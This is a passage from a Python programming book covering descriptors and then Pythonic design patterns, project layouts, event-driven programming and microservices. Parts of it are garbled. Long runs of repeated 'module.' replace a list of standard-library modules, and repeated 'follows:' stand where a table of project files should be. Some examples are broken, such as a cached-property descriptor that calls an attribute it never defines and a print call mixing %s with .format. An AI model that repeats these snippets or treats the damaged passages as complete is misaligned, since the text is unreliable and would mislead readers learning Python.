that accept self as the first argument, is overridden and this ensures that parameters have no bindings.

Slots

In the other sections of the book, we have discussed how the __slots__ can be used to decide which APIs should be exposed when someone imports the class. Similarly, when we define __slots__ as an attribute of the class, it can store all the attributes expected by the class.

Why do we need such a feature? Say you are creating the class for the clients to use, but do not want them to add any extra property dynamically in the course of the usage. If one attempts to add the additional attributes to the class in which __slots__ is defined, an AttributeError exception is raised. Therefore, you have just made the class static, which means that the __dict__ attribute will not be created, and you cannot dynamically add objects.

This raises another question – if there is no where are the attribute values retrieved from? The answer is descriptors. Every entry defined in __slots__ will have a descriptor that can persist and return its value when called:

class Car: __slots__ = ("make", "model") def __init__(self, make, model): self.make = make self.model = model

def __repr__(self ): return f "{self.__class__.__name__}({self.make}, {self.model})"

This is interesting and useful in several scenarios that you might come across in production code. However, what we are compromising here is the dynamic nature of Python – hence, caution is advised.

Only use this feature, when you are absolutely certain that you want to create a static object and no dynamic attributes need to be added.

On the other hand, benefits of using this technique include reduction in memory usage for the objects as they operate on a fixed set of fields and avoid using a complete dictionary.

Implementing descriptors in decorators

Let us summarize the different aspects that we have discussed about descriptors and their use with decorators:

Firstly, we have seen how descriptors are used in Python to make functions behave as methods, when they have been defined inside the class. We also saw cases, where we have used the __get__() interface method of the descriptor protocol to create decorators in accordance with the object that it needs to be called on.

So, the technique to adapt the decorator is simply to implement the __get__() method and make use of MethodTypes from the types module for the conversion of the callable, which here is the decorator being created, into a method that binds to the object, which is the parameter to

Now, while creating the decorator, we have to create them as objects and not as functions – this is because functions are objects that already have their own __get__() implementation, which then lead to utter confusion for the developer. The smart thing to do here is to use a class for creating the decorator.

Use classes for defining decorators and make them callable with the __get__ interface method implementation. Avoid using functions which are objects with their own __get__ methods.

Best practices while using Python descriptors

When we are working with descriptors in our code, the methods of the descriptor protocol need to be implemented. The __get__ and __set__ interface methods are the key definitions that must be worked with. Their signatures look like the following:

__get__(self, obj, type=None) -> object __set__(self, obj, value) -> None The performance and clarity of your descriptor code depends upon how well you understand the components you are implementing. Some of the aspects to keep in mind with respect to the preceding signature are as follows:

self is the descriptor instance that is being written.

obj is the object to which the descriptor needs to be bound.

type specifies the type of the object that is bound to the descriptor. Another point to be aware of is that the __set__() method does not require the type argument that was discussed earlier, since this method is called on the object itself and the type is inferred.

On the other hand, as we have seen, is possible to be invoked using the object as well as the class.

Descriptors are instantiated only once per class

Another key point to note here is that, just like class members, Python descriptors are instantiated once for each class – and all the instances of that particular class will be sharing the descriptor instance. This is a tricky fact, which if missed, can come back to haunt you later. Consider the following example of a classic mishap if you do not keep this in mind:

class SingleDigitNumber: def __init__(self ): self.number = 0

def __get__(self, myObj, type=None) -> object: return self.number

def __set__(self, myObj, number) -> None: if int(number) != number or number > 9 or number < 0: raise AttributeError("Enter a valid 1-digit number") self.number = number

class Demo: number = SingleDigitNumber() object_one = Demo() object_two = Demo()

object_one.number = 8 print(object_one.number) print(object_two.number)

object_three = Demo() print(object_three.number)

Notice that we create a class Demo that has an attribute called number – a descriptor. The descriptor persists the value it takes in within the descriptor. So, what issue do you foresee when this is run? Why this will not work is because we have created a class-level attribute which is shared across all instances. Let us execute the following: >>> python descriptors.py 8 8 8 No matter whether the instrument was created before or after the __set__ method is invoked, the objects share the same values.

Now, how can we fix this? One option would be to persist the descriptor values for all the objects in a dictionary. We think this would work since the myObj parameter is passed to both the __get__ and __set__ methods, and is a reference to the current object and can be a candidate for the key. Consider the following updated example:

class SingleDigitNumber: def __init__(self ): self.number = {}

def __get__(self, myObj, type=None) -> object: try: return self.number[myObj] except: return 0 def __set__(self, myObj, number) -> None: if int(number) != number or number > 9 or number < 0: raise AttributeError("Enter a valid 1-digit number") self.number[myObj] = number

class Demo: number = SingleDigitNumber()

object_one = Demo() object_two = Demo() object_one.number = 8 print(object_one.number) print(object_two.number) object_three = Demo() print(object_three.number)

When this updated code is executed, we see that the results are now correct and the code operates properly. >>> python descriptors.py 8 0 0 There is one unforeseen disadvantage of this approach. Here, the descriptor we defined stores a strong reference to the original object within itself. When you destroy an object, there is still an existing reference to the object – this causes the memory to not be released by the garbage collector. An alternative way to handle this might be by using weak references, but that may not be possible for every object type in Python, such that when they are deleted, they will disappear from the dictionary. Instead, a proper way to approach this would be just do not store the values within the descriptor. The ideal location would be to store the value in the object corresponding to the descriptor. Consider the following updated example: class SingleDigitNumber: def __init__(self, number):

self.number = number

def __get__(self, myObj, type=None) -> object: return myObj.__dict__.get(self.number) or 0 def __set__(self, myObj, number) -> None: myObj.__dict__[self.number] = number

class Demo: number = SingleDigitNumber("number") object_one = Demo() object_two = Demo()

object_one.number = 8 print(object_one.number) print(object_two.number) object_three = Demo() print(object_three.number) That works great. The value is now stored in the object’s __dict__ attribute under the same name as the descriptor. However, there is still that one small compromise that we are doing – you have to explicitly specify the name of the descriptor as an argument while instantiating it. number = SingleDigitNumber("number")

This works but is not elegant or Pythonic. This time, remember the other, less significant interface method of the descriptor protocol – the __set_name__() method.

__set_name__(self, owner, name) Now, with this method, you will be able to automatically assign the name parameter, when you instantiate the decorator. The final updated example would look something like the following: class SingleDigitNumber(): def __set_name__(self, owner, prop_name): self.name = prop_name def __get__(self, myObj, type=None) -> object: return myObj.__dict__.get(self.name) or 0

def __set__(self, myObj, number) -> None: myObj.__dict__[self.name] = number

class Demo(): number = SingleDigitNumber() object_one = Demo() object_two = Demo()

object_one.number = 8 print(object_one.number)

print(object_two.number)

object_three = Demo() print(object_three.number) Executing the preceding code now will still provide the desired results:

>>> python descriptors.py 8 0 0

Notice that we are now using the __set_name__() method instead of the __init__ method of the object. Now there is no further need to explicitly pass the name of the descriptor while instantiating it. What you achieve is more clean and Pythonic.

Put descriptors at the class level

Remember that for descriptors to behave in a sane manner, you have to define them at the class level. Otherwise, Python will not call the __get__ and __set__ methods by itself. Let us take an example to see how this works. Assume that we have a decorator DemoDescriptor that returns a constant value when invoked. The code would look like the following:

class Demo(object): value_y = DemoDescriptor(84) def __init__(self ): self.value_x = DemoDescriptor(84)

>>> myObj = Demo() >>> print("X is %s, Y is %s".format(myObj.x, myObj.y)) X is , Y is 84

It is evident from the preceding code that when the class-level descriptor is accessed, the __get__ methods are automatically invoked. The access of the instance descriptor does not perform any operation, and simply returns the descriptor itself.

Accessing descriptor methods

Decorators have the interface methods of the descriptor protocol implemented; however, they are simply classes, and you can add additional methods to them. One great use case would be to implement the callback properties. As an example, let’s say we want to send a notification or an email whenever the state of a class is altered, and we do not want to modify the class to do that. Let us look at that in the following code: from weakref import WeakKeyDictionary

class CallbackProperty(object): """A property that will alert observers when upon updates""" def __init__(self, default=None): self.default = default self.dataset = WeakKeyDictionary() self.callbacks = WeakKeyDictionary()

def __get__(self, myObject, owner): if myObject is None: return self return self.dataset.get(myObject, self.default)

def __set__(self, myObject, value): for callback in self.callbacks.get(myObject, []):

# alert callback function of new value callback(value) self.dataset[myObject] = value

def register_callback(self, myObject, callback): if myObject not in self.callbacks: self.callbacks[myObject] = [] self.callbacks[myObject].append(callback)

class CreditCard(object): expense = CallbackProperty(0) def limit_breach_alert(value): if value > 10000000: print("You have maxed out your credit card.")

>>> card = CreditCard() >>> CreditCard.expense.register_callback(card, limit_breach_alert)

>>> card.expense = 20000000 You have maxed out your credit card. >>> print("Balance is %s" % card.expense) Balance is 20000000 >>> card.expense = 100

>>> print("Balance is %s" % card.expense)

Balance is 100

Why use Python descriptors?

Now, you know what Python descriptors are and how Python itself uses them to power some of its features, like methods and properties. You have also seen how to create a Python descriptor while avoiding some common pitfalls. Everything should be clear now, but you may still wonder why you should use them.

In my experience, I have known many advanced Python developers that have never used this feature before and that have no need for it. That is quite normal because there are not many use cases where Python descriptors are necessary. However, that does not mean that Python descriptors are just an academic topic for advanced users. There are still some good use cases that can justify the price of learning how to use them.

Lazy properties of descriptors

All that we have discussed uptil now in this chapter have been leading to this. Lazy properties – those whose values are not loaded until they are specifically accessed – are the simplest use cases for descriptors.

Let’s take an example of a class Universe that houses a method called answer_to_life() which returns a value after a lot of thinking: import random, time class Universe: def answer_to_life(self ): time.sleep(5) # Consider this thinking time. return 42

myUniverse = Universe() print(myUniverse.answer_to_life()) print(myUniverse.answer_to_life()) print(myUniverse.answer_to_life())

Invoking this method returns a value after every 5 seconds. What we want here is the lazy properties to avoid recomputing the value everytime if the result is the same. Remember the cached properties using the descriptors that we discussed in a previous section? That is what will come in handy here.

import random, time

class CachedProperty:

def __init__(self, func): self.func = func self.fname = func.__name__

def __get__(self, instance, type=None) -> object: instance.__dict__[self.fname] = self.function(instance) return instance.__dict__[self.fname]

class Universe: @CachedProperty def answer_to_life(self ): time.sleep(5) return 42 myUniverse = Universe() print(myUniverse.answer_to_life()) print(myUniverse.answer_to_life()) print(myUniverse.answer_to_life())

We have now updated the code to use a non-data descriptor that can store both the function as well as the generated values for future use. So, for the first invocation, the __get__() of the descriptor is called, and for every subsequent call, the value is

retrieved from the __dict__ from the instance, thereby shaving off a ton of processing time.

Lazy properties only work with non-data descriptors. If you use data descriptors, then this trick is rendered useless.

Code in accordance to the D.R.Y. principle

We have already discussed the D.R.Y Repeat principle before creating the modular non-duplicate code. Descriptors in Python present a useful tool set for creating code that is reusable and can be shared among different properties or classes.

Let us see an abstract example of a class that has four different properties, and each property can be conditionally set to a specific integer if it is a prime number. In all the other cases, it will be reset to zero. Assume that we have a is_prime() function that checks whether a number is a prime number or not.

class PrimeDeals: def __init__(self ): self._prop_one = 0 self._prop_two = 0 self._prop_three = 0 self._prop_four = 0 self._prop_fine = 0

@property def prop_one(self ): return self._prop_one

@prop_one.setter def prop_one(self, number):

self._prop_one = number if is_prime(number) else 0

@property def prop_two(self ): return self._prop_two

@prop_two.setter def prop_two(self, number):

self._prop_two = number if is_prime(number) else 0 @property def prop_three(self ): return self._prop_three

@prop_three.setter def prop_three(self, number): self._prop_three = number if is_prime(number) else 0 @property def prop_four(self ): return self._prop_four @prop_four.setter def prop_four(self, number): self._prop_four = number if is_prime(number) else 0

>>> deals = PrimeDeals() >>> deals.prop_one = 7 >>> deals.prop_two = 4

>>> print(deals.prop_one) 7 >>> print(deals.prop_two) 0 Notice how much code is duplicated for each property that we defined here. Python is more about elegance and this repeated code defeats the purpose. How can you make this code Pythonic? Consider using descriptors for defining the property behaviour in a common section. We can define a PrimeNumber descriptor that can then be used for all the properties. Check out the following code: class PrimeNumber: def __set_name__(self, owner, fname): self.fname = fname

def __get__(self, instance, type=None) -> object: return instance.__dict__.get(self.fname) or 0 def __set__(self, instance, val) -> None: instance.__dict__[self.fname] = (val if is_prime(val) else 0) class PrimeDeals: prop_one = PrimeNumber() prop_two = PrimeNumber() prop_three = PrimeNumber()

prop_four = PrimeNumber() >>> deals = PrimeDeals() >>> deals.prop_one = 7 >>> deals.prop_two = 4 >>> print(deals.prop_one) 7 >>> print(deals.prop_two) 0

This code looks way more compact and more importantly, Pythonic – no duplicates and modular structure to incorporate future changes easily.

Conclusion

We have gone through how descriptors are used in Python to fuel up some of its more interesting features. Descriptors are quite useful when some behaviour needs to be shared among properties within a class or among multiple classes. Understanding them in detail will make us more conscious developers and writing Pythonic code comes naturally when we understand why things are implemented the way they are. Descriptors are one of the critical language features that constructs in Python use heavily. In the next chapter, we will be looking at the different ways we can apply Pythonic design patterns in order to create robust, extensible, and manageable application code.

Key takeaways

If the descriptor implements the __delete__ or __set__ methods, it is referred to as a data descriptor, and if it only implements the __get__ method, we call it a non-data descriptor.

The property() method results in a descriptor protocol implementing a descriptor object. The class methods are just static methods that take in the reference to the class as the first argument of the parameter list.

While defining a callable, remember that if you make it a descriptor, you can use them in classes and class attributes.

Every entry defined in __slots__ will have a descriptor that can persist and return its value when called.

To make a read-only data descriptor, define both __get__() and __set__() with the __set__() raising an AttributeError when called.

Properties are just a particular case of descriptors which means that we can use descriptors for far more complex tasks.

Descriptors can help to create better decorators by making sure that they will be able to work correctly for class methods as well.

When it comes to decorators, we could say that it is safe to always implement the __get__() method on them, and also make it a descriptor.

Python descriptors are instantiated only once for each class – and all the instances of that particular class will be sharing the descriptor instance.

The code of a descriptor will contain more implementational code, rather than business code.

Further reading

Jacob Zimmerman, Python Descriptors: Understanding and Using the Descriptor

CHAPTER 9 Pythonic Design and Architecture

“Design is not just what it looks like and feels like. Design is how it works.”

— Steve Jobs, Apple

Inspiration can often seem illusive and out-of-reach when you need it the most. Unfortunately, you often cannot call it a day when you’re feeling uninspired or frustrated by your designs – or the lack thereof. Oftentimes, you are working on a strict deadline that’s keeping you up late into the night, thinking – how can I make this design better?

Structure

In this chapter, we will be broadly covering the following topics: Python specific design patterns

Architecture of Python applications

Event driven programming Microservices architecture

Scaling Python applications

Application security guidelines

Peek into input validations

Objectives

Now that we have gone through most of the Pythonic constructs and best practices around the key language concepts, we can put the pieces together. When you start building an application, it is vital to design an appropriate architecture for it. Just like using the most expensive materials will not make a building strong and timeless if the foundation is weak, a robust architecture will only help ensure that a software is built to last. Having learnt the concepts covered in this chapter, you will be able to do the following:

Understand and use design patterns coupled with the Python language.

Chart out scalable architectures in the design phase.

Differentiate the intricacies of event-based, microservice, and API architectures.

Build applications that focus equally on security as well as business logic.

Python specific design patterns

In Software Engineering, Design Patterns play a crucial role for delivering reusable solutions to the usual problems faced in the software design domain. They are more often the culmination of idiomatic and best practices that are adopted by the seasoned software engineers over the years. However, the design patterns should only be considered as templates for solving a problem with greater efficiency, rather than a final design to be directly implementable in code. Most of us, in our early years in computer science, have gone through the much-acclaimed book, “Elements of Reusable ObjectOriented Software”, also popularly known as “Gang of Four”. They cover several design patterns, agnostic of language, which build up the foundation for great software. Several resources describe how these can be applied to Python applications.

Python, as a language has evolved with several novel constructs and paradigms, compared to other OOP languages, which can make for awesome application design patterns. In this section, we will be discussing some of the design patterns that are more relevant to Python software development.

The global object pattern

Namespaces in Python are restricted to the scope of the modules. For example, two different modules can have a function with the same name doing similar stuff and yet remain isolated from each other if they are defined in different modules. The loads() method in the pickle and json modules is one such example.

In the absence of this feature, conflicts would become a common case. If you are developing a third party module, then you would have to know or look up every other module in the standard library, or otherwise, which might exist. Every change would come with the risk of conflicting with other namespaces. In languages where this is a possibility, people generally resort to hacks as adding suffices, prefixes, or punctuations to define their pseudo namespaces. This would clearly have been short of a disaster.

In Python, everything is an object. The Global Object pattern describes the conventions regarding the naming of modules at the global level. Broadly, there are two different classifications for the use of Global Modules:

Prebound methods: In this pattern, the module creates an object and the bound methods of the object are assigned to the global level names. You can then invoke these methods without having to locate the object.

Sentinel objects: The Python Standard library and a few third party modules define and access the sentinels on a global level. Although, it is not mandatory for a Sentinel Object to be defined globally, they could be attributes of a class or even private as per convention.

Let us look at these in a bit more detail.

The prebound method pattern

This is a mechanism for defining callables at the global level that share their state with the help of a global object. Suppose you are creating a Python module that needs to define a few routines that should be accessible from the global namespace, then they will have to maintain a common or shared state during the runtime.

The robust random module in Python is a good example of this. Even though you can use it to create custom Random objects – if you use the module out of the box, several routines including the likes of or choice() are available to be used from the global namespace, without invoking them by using any Random object.

So, how do these direct calls work under the hood? What happens here is that the random module has already created an object of itself and bound these global methods to it, before making them available for direct use. They share their states via the automatically created object. If you are creating a module that needs to make such routines globally available, you need to do the following: Create an instance of your class at the module’s top level.

The name should be starting with an underscore which prevents it from being exposed to the users and is not messed around with.

Create and assign to the global namespace, a bound copy of every intended method of the object.

This can be illustrated with the help of a custom random class like the one in the Standard Library:

from datetime import datetime as dt

class RandHex(object): def __init__(self ): self.instantiate_seed(dt.now().microsecond % 255 + 1)

def instantiate_seed(self, seedVal): self.random_seed = seedVal

def get_random(self ): self.random_seed, carry = divmod(self.random_seed, 2) if carry: self.random_seed ^= 0xb8 return self.random_seed # create internal instance _instance = RandHex()

# Assign to the global namespace random = _instance.get_random

Now, when the users want to use this functionality, they simply have to invoke the method in a stand-alone manner. However, all calls to these methods would have to share the same underlying object in secret, which the user does not have to manage or care about.

It is important to note that caution should be exercised in these import time instantiations, if your class constructor instantiates DB connections, writes to file, or opens sockets. These could have side-effects or conflicts with creating an internal object. To avoid these, you can create a setup method for other instantiations and require users to call it before usage.

For all the lightweight libraries being created, the Prebound Method pattern provides an efficient and idiomatic way to make stateful module or class behaviour available at a global level.

There are several instances of the usage of this pattern if you go through how the Standard Library modules are implemented. Take for example, the following old reprlib module that exposes the repr method: aRepr = Repr() repr = aRepr.repr

Also, in the calendar module, the methods are exposed something like the following: cal = TextCalendar() prcal = cal.pryear prweek = cal.prweek week = cal.formatweek prmonth = cal.prmonth month = cal.formatmonth calendar = cal.formatyear The Prebound Method pattern is used in several other libraries of the Standard Library, including, but not limited to the following: _sysrand from the secrets module. _global_log from the distutils.log module.

_semaphore_tracker from the _forkserver from the multiprocessing.forkserver module.

module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module.

module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module. module.

module. module. module. module.

module. module. module. module.

module. module. module. module. module. module. module. module. module. module. module. module. module.

The sentinel object pattern

It is easy for developers when the domain specifies a value for every type of data, whether it is names in a database, or a value of age of people. Usually, when dealing with data in Python programs, the None value is used in places where there is missing or unspecified values in the data. Consider, a scenario where you are processing a dataset, and None is treated as a valid value to be stored or processed. How, then, do you depict the ‘unpleasant’ values in this case? We use a sentinel object that serves as a custom unique object for indicating the values that are unspecified or missing. In this section, we will be looking at the different mechanisms where we can differentiate between reasonable useful information and the placeholder values using the Sentinel Object Pattern.

Sentinel value

A standard example of Sentinel Values that most Python developers have come across while using the Standard Library is the find() method of string objects. When compared to the index() method which has stricter checks, it does not use sentinels. The find() method returns the index of the first occurrence of a search string, if found, else it returns The index() method on the other hand raises an exception when there was no match. Refer to how they save a line or two and appear cleaner, from the following example:

The regular way:

try: indx = myStr.index(searchStr) except: return

The Pythonic way:

ind = myStr.find(searchStr) if ind == -1: return

The -1 is the sentinel value here, whose predefined special meaning is that it denotes a failed search. However, some

programmer might just have decided to use negative indices for his string searches, and it would create a potential confusion.

The concept of sentinel values have been used for a long time. However, modern day Python would simply have used None as the Sentinel Value, thereby avoiding its use as an index in the string itself. Advanced languages like Golang enforce a String sentinel values to be returned from the methods, rather than the simple references to them. A specialized string in Golang can help to indicate a failed search and/or a missing value.

Null pointers

Those coming from a C++ or C background would be familiar with NULL pointers. This would be something that Pythonistas never had to care about as it is deemed to complicate the data model of the language.

In the Python namespace, every name is allocated a reference. A name can either exist, not exist, or have a reference to an object behind the scenes. Even when a name is not pointing to anything useful, it will be pointing to the None object containing a valid reference in memory.

There are no NULL pointers in Python. Every name is always guaranteed to hold a valid address.

Hence, you will never see a Segmentation Fault error in Python in spite of it being implemented in C, which in languages like C means that somewhere you might have missed a check for NULL types. All Python values including or False are defined as objects and have valid addresses.

The null object pattern

Now that we have talked about Null Pointers, let’s move on to discuss a pattern that has nothing to do with Null Pointers. Null Objects represent sane and valid objects that can be used to depict values that are blank or inexistent. It is a Sentinel Object.

Consider a scenario where we have several Soldier objects, where one soldier might have another Soldier as their Commander, but that may not always be the case in the hierarchy. Here, the Pythonic way to deal with these objects would be to assign None to the Commander field of those that do not have one.

If you now have a function to print the details of the soldier, the None sentinel object will need to be specifically checked before operating on the Commander object. Refer the following example:

for sld in soldiers: if sld.commander is None: cmdr = 'Batallion Leader had no commander!' else: cmdr = sld.commander.get_name() print(sld.name, '-', cmdr) You will have to do the same in every place where the commander attribute is attempted to be accessed. The idea in this design pattern is to replace the usage of the None object with a

custom object that is designed to indicate the idea that no value exists, for example:

NO_COMMANDER = Soldier(name='no commander')

The Soldier objects can now have the NO_COMMANDER object wherever we tried assigning None before. The benefits of this approach would be as follows:

The sentinel value can be used and accessed just like other valid objects. So, there will be no need to handle the special case anymore using an if statement, since the code will run fine out of the box even for the sentinel object.

This also makes the code more readable. You can have multiple types of sentinel objects denoting different error or failure situations, rather than using a single generic None object. Although it might not be that simple to design a custom null object for cases where the object does some statistical or other calculations. However, the Python Standard library makes use of this pattern; for example, the logging module implements a NullHandler which can be used in situations where this is required but there is no actual logging to be done.

Sentinel object patterns in Python

Finally, we discuss the Sentinel Pattern in Python. The built-in None object serves as the basic sentinel value for most of the use cases of basic datatypes. This should be sufficient for simple programs, where you can test the sentinel using the following:

if value is None: … However, there are a couple of situations where one might look to something more than None to serve as the sentinel value. Take a look at the following:

First, let say the user wants to use a data store, where the None value has some significance. In that case, you indeed need a different error value. Take the example of the lru_cache() method in the functools module in the Standard Library, which under the hood uses the sentinel pattern. Every instance of the cache creates a separate unique object within the closure:

# unique object used to signal cache misses sentinel = object() Now, the interesting part is that using the cache_get method (an example of a Prebound Function pattern), you can now distinguish between the two cases – the first, where an entry has been

created in the cache and assigned to and the second, where no entry has been created for something in the cache. The usage would look like the following:

value = cache_get(key, sentinel)

if result is not sentinel: …

There are several such occurrences in the Standard Library of Python. Some of them include the following:

The lru_cache() method of the functools module. The global _UNSET sentinel in the configparser module.

Secondly, the other use case that warrants the custom sentinel values is when the functions and methods needs to verify if an optional kwarg has been supplied. The general practice is to set the default value to However, if there is a use case to different parameter values from None, a sentinel object can be used. Regardless of where it is being used, the fundamental of the Sentinel Object pattern is that it refers to the identity of the object, rather than the value, and that is how its significance is noted by the surrounding objects. Unlike if we use the equality (==) operator on sentinels, then only the Sentinel Value, discussed earlier, is compared. However, they are compared for the existence with the is operator.

The simple principle is that when the functions return consistent values, bearing the same properties, then the end users can depend on the behavior and use them without explicit checks on their end. This enforces Polymorphism at the function level.

The influence of patterns over design

Like most concepts in software engineering, the pros and cons of Design Patterns depend completely upon how they are implemented. Basic scripts or snippets can follow a simple approach and do just fine without considering any design patterns. Forcing the use of a design pattern is over-engineering – some developers who do not understand adaptive and flexible software development often are prone to this. Contrary to popular belief, writing great software was never about predicting the future requirements or edge cases. Rather, it is simply about solving the current problem in a manner that allows changes in the future. It should simply be flexible enough to be modified in the future. You cannot solve all the problems today.

Before creating a generic solution, remember the rule of three – when you encounter three or more instances of the same problem that need to be addressed, only then you can come up with a required abstraction; else, it is just over-engineering.

At this point, you should start thinking about the design patterns and their application, since you have pinpointed the problem as well as the pattern of occurrence and abstraction.

Design patterns are high-level ideas. The decision on how to use them varies from scenario to scenario and developer to developer. My personal approach to using design patterns is to start by coming up with a solution to solve the problem at hand by creating the appropriate abstractions, and then go on to verify if it can be modeled around some design patterns. If some pre-defined pattern fits the use case, it is wise to go ahead with an already proven and validated construct, thereby providing increased quality and confidence in the product.

Python application architecture

Python has a lot to say when it comes to style and syntax of code on how to make things idiomatic. However, when it comes to structuring the application code, it is relatively flexible. This flexibility can help decide on the specific architectures of the applications based on their use case, but can also confuse novice developers.

With great flexibility, also comes great opinions on how to do something well. In this section, we will be discussing some standard application designs that are conventionally accepted across several global applications. Some of them might have been pointed out briefly in the other parts of the book, but let us consolidate them in detail here.

Utility scripts

In a production environment, there are several instances when we need to do some pure automation work that might be even spanning a single script. They need not be part of the extravagant applications and should be good enough to be executed from the command line.

Now, generally, these scripts are accessed and maintained by multiple users, and hence it is imperative to include clear code and tests for the application.

The following structure is what is conventionally considered informative and robust for the command line applications:

application_name/ │ ├── .gitignore ├── application_name.py ├── application_tests.py ├── setup.py ├── requirements.txt ├── README.md └── LICENSE

You notice that everything has been placed in the same directory with the application name being the same as the directory name?

With minimal files, you should now be able to create an app that can be tested, executed on the CLI, as well as packaged and distributed as an executable.

For those who are encountering these files for the first time, the specifications are as follows:

follows:

follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows: follows:

Table 9.1: Common meta files in a Python Project

Deployable packages and libraries

Now, consider that your application has evolved into one that is more complex, and houses several sub-modules that come into play for enabling the functionality of the main application. More than that, you should have the flexibility to share, install, or deploy the application on multiple machines for the users. In such a case, the package can be structured in the following manner:

application_name/ │ ├── bin/ ├── docs/ │   ├── installation.md │   └── how_to.md ├── application_name/ │   ├── __init__.py │   ├── appname.py │   └── helpers.py | ├── module_one/ │   ├── __init__.py │   ├── module_one.py │   └── helpers.py | ├── data/ │   ├── mock_inputs.csv │   └── result.xlsx

| ├── tests/ │   ├── application_tests.py │   └── test_helpers.py ├── .gitignore ├── setup.py ├── requirements.txt ├── README.md └── LICENSE

In such applications, demarcating the functionality into different sub-directories creates unique namespaces that can be used to isolate the code and use it from anywhere.

Remember that these are simply conventional templates. If your specific use case warrants something drastically different, feel free to update. Although, having a docs/folder is encouraged.

Web application – Flask

Python is also increasingly popular in the web application sphere for the rapid prototyping of robust and secure web applications. Flask and Django are two of the most heavily used frameworks.

Flask, unlike Django, is a barebones framework for setting up lightweight web applications. The official Flask documentation outlines several suggestions for the layout of Flask projects. The main project directory of a Flask application would look something like the following:

flask_app/ │ ├── flask_app/ │   ├── ___init__.py │   │   │   │   │   │   │   │   │   │   │   │  

├── db.py ├── schema.sql ├── auth.py ├── blog.py ├── templates/ │   ├── base.html │   ├── auth/ │   │   ├── login.html │   │   └── register.html │   │ │   └── blog/ │       ├── index.html

│   │       └── display.html │   │ │   └── static/ │       └── style.css │ ├── tests/ │   ├── data.sql │   ├── test_db.py │   ├── test_auth.py │   └── test_blog.py │ ├── venv/ │ ├──. gitignore ├── setup.py └── MANIFEST.in

It is evident that even a Flask application is built similar to how we define Python libraries and modules. The tests and the virtualenvs are placed in the same project, yet outside the main application for the proper segregation of roles.

Web application – Django

Django has been around for a while, and a feature I have found fascinating from the very day is that it generates a skeleton structure for the project by simply running an instantiation command:

django-admin startproject project_name A project template will be created in the current working directory and will be named as

The structure would look something like the following:

project_name/ │ ├── project_name/ │   ├── __init__.py │   ├── settings.py │   ├── urls.py │   └── wsgi.py │ └── manage.py Django apps can be considered as specialized versions of packages that can be imported and used elsewhere as well. To

create an application, you simply go to the directory that contains the manage.py script and execute the following:

python manage.py startapp application_name

This will create the application directory within your project folder and contain scripts for the models, views, and tests as well. Thus, Django simply makes life easier by taking care of the barebones architecture of the project itself. For production of the Django applications, you are advised to take inspiration from the deployable application structure and add the additional parts to the structure created by Django.

Event driven programming architecture

Events are basically inputs that the program can process during execution from user interactions, to messages in a queue or even sensor or hardware inputs. Event-driven programming refers to the separation of event-handlers logic from the program’s business logic. It is a programming paradigm and does not have any particular syntax or rational to be considered. Depending upon the use case, event-driven programming can help to make your application responsive, flexible, and help to improve the throughput.

In this paradigm, we have separate function or methods called the event handlers that are triggered when an event is received. The event handlers are wired to process specific inputs like the incoming messages, keystrokes, data streams, or mouse movements. In Python, this makes use of an event loop that constantly keeps listening for any new events that come in.

Figure 9.1: Single threaded event loop

Contrast with concurrent programming

Everyone who comes from a background of parallel or concurrent programming, the question that comes to mind is how does this differ from the event-based programming that we are discussing here? Even though they may be listening to multiple sources of events at the same time using the event handlers, they do not truly follow the parallel or concurrent programming paradigms. Event-based programming constructs usually work on a single thread of execution. Based on what kind of events are received, the event handlers are interleaved as sequential executions. The following charts depict the sequence of event in both the types:

Figure 9.2: Parallel task execution with multithreading

Alternatively, if you consider event-driven programming constructs, the sequence of execution would look something as illustrated below:

Figure 9.3: Asynchronous task execution on a single thread Thus, the tasks are executed in an interleaved manner. There is a slot assigned to each task during the event loop, and only one of them executes at a time. When a task is done for now, the control is passed back to the event loop and another task can take up the next slot, resulting in a form of cooperative

Figure 9.4: Overview of event based systems architecture

The advantage of the event loop is that it operates in a nonblocking manner. This can sometimes lead to a better performance compared to concurrent programs if they have blocking calls. Applications in the networking domain are a prime example for this, the use of thread-safe Event Loops are useful, specifically due to their use of single available network connection and information being processed only when available.

Exploring concurrency with event loops

When solving a problem using only concurrency, the challenge is that there will be several cases of memory management to deal with and avoid any bugs due to the tasks encountering a blocking action. The idea to optimize the situation is to combine the best of both worlds – concurrency and events together. The Nginx server model demonstrates how an architecture like the following works:

Figure 9.5: Concurrency with event loops

The main event loop worker for reasons of safety takes up the processing of networking events and configuration in a single thread. However, any blocking call operations like file reads or HTTP request processing are handed over to the Thread Pool that will then schedule and execute the task in parallel. Upon

completion of the job, the result is handed back to the main event loop where it is processed in a thread safe manner.

This architecture combines the best of both worlds – the resilience of thread safety along with the benefits of concurrent or parallel executions – which not only utilizes the maximum CPU cores but also keeps the non-blocking event handling on an event loop with a single thread.

We will be getting more insights into this paradigm in the section on scaling Python application, later in the chapter.

Microservices architecture

The microservices architecture is all about building a relatively complex application as a combination of several smaller interactive services that run independently and communicate with each other with the help of lighter mechanisms like the HTTP protocol. You can deploy the smaller services independently and scale them as needed, without relying on a ton of configuration. The microservices are considered to derive their inspiration from the Service Oriented Architectures paradigm, which specifies that an application should be developed as a collection of dynamic, mutually interacting services that operate independently, rather than a monolithic application which is built top-down.

The older means of building the monolithic applications typically have the following components:

The frontend or the UI used by the clients built using the web technologies, typically JavaScript and HTML/CSS.

The business logic residing on a server.

Data storage in the form of structured databases to persist data for the short and long term.

To design a similar solution using the microservices architecture, the different components are further split into different services.

For example, the business logic residing on the server can be implemented in the form of multiple interacting services and they lie at different levels in the flow of control for the application.

Similarly, the data stored in the databases can be divided into multiple different data storages, depending upon the use, size, or the schematics of the data. For microservices, since the communication between the components is quite frequent, the messages are typically JSON objects.

The following illustrates how a monolithic application differs from a microservice application on an architectural level:

Figure 9.6: Monolithic vs microservice architectures

Frameworks supporting microservices in Python

Microservices are more of a design philosophy. It is difficult to think of a framework that would adhere only to this philosophy. However, there are some properties that any framework should possess in order to be a viable option for building Microservicebased applications:

Flexible architecture Lightweight core components

Minimalistic configurations

